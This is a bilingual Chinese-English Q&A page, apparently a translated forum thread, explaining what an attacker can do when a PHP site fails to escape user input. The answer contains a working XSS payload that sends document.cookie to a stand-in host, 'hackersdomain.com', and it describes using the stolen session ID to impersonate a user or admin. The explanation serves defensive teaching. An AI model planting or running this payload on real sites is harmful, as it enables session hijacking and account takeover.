XSS攻击如何真正起作用? [英] How XSS attack really works?

问题描述

因此，防止网站受到XSS攻击非常简单，只需使用htmlspecialchars功能就可以了.
但是，如果开发人员忘记使用它，攻击者/黑客会怎么做?他可以获取您的session_id，对吗?这是一个问题.他该怎么办?
非常感谢.

So, preventing website from XSS attack is very simple, you just need to use htmlspecialchars function and you are good.
But if developer forgot to use it, what can attacker/hacker do? He can get your session_id, right? And here is a question. What can he do with that?
Thank you very much.

推荐答案

因此，防止网站受到XSS攻击非常简单，您只需要使用htmlspecialchars函数就可以了.

So, preventing website from XSS attack is very simple, you just need to use htmlspecialchars function and you are good.

对.当您要重新显示用户控制的输入时，可以在任何地方使用它.这涉及到HTTP请求的所有部分:标头，正文和参数.

Right. Use it anywhere when you're going to redisplay user-controlled input. This concerns all parts of the HTTP request: headers, body and parameters.

但是，如果开发人员忘记使用它，那么攻击者/黑客可以做什么?

But if developer forgot to use it, what can attacker/hacker do?

他/他可以插入一些恶意的HTML/脚本.例如.网页上的某些消息/评论中有以下内容:

S/he can insert some malicious HTML/script. E.g. the following in some message/comment at a webpage:

<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>

上面的代码将请求来自mailicious域的图像以及文档cookie作为查询字符串.

The above will request an image from the mailicious domain along with the document cookie as query string.

他可以获取您的session_id，对吗?这是一个问题.他能怎么办?

He can get your session_id, right? And here is a question. What can he do with that?

会话ID存储在cookie中.一旦通知黑客黑客已请求使用查询字符串中的cookie来请求图像，他/她要做的就是编辑浏览器的cookie，以包括与原始用户相同的会话ID来登录.如果原始用户是站点管理员，这显然非常危险.

The session ID is stored in a cookie. Once the hacker is notified about that an image has been requested with the cookie in query string, all s/he has to do is just to edit the browser's cookie to include the same session ID to get logged in as the original user. This is obviously very dangerous if the original user is the site admin.

这篇关于XSS攻击如何真正起作用?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！